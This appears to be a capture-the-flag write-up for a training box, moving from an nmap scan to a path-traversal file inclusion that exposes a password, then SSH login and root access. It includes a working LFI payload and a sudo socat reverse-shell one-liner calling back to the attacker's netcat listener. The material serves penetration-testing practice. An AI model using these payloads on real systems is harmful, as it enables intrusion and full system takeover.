1. Nmap

$ nmap 10.10.161.132
Starting Nmap 7.91 ( <https://nmap.org> ) at 2020-11-20 10:48 AEST
Nmap scan report for 10.10.161.132
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

2. HTTP

Page format: 10.10.161.132/article?name=hacking

Try LFI: 10.10.161.132/article?name=../../../../etc/passwd → success!

Atypical line: #falconfeast:rootpassword

3. SSH

@kali:~$ ssh [email protected]
[email protected]'s password: rootpassword
falconfeast@inclusion:~$

falconfeast@inclusion:~$ cat user.txt -> success!

4. PrivEsc

# SSH
falconfeast@inclusion:~$ sudo -l
Matching Defaults entries for falconfeast on inclusion:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User falconfeast may run the following commands on inclusion:
    (root) NOPASSWD: /usr/bin/socat

# [<https://gtfobins.github.io/gtfobins/socat/>](<https://gtfobins.github.io/gtfobins/socat/>)

# Kali
@kali:~$ nc -lnvp 4444
listening on [any] 4444 ...

# SSH
falconfeast@inclusion:~$ RHOST=<my-THM-IP>
falconfeast@inclusion:~$ RPORT=4444
falconfeast@inclusion:~$ sudo socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

# Kali
connect to [<my-THM-IP>] from (UNKNOWN) [10.10.161.132] 38924
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

# cat /root/root.txt
cat /root/root.txt -> success!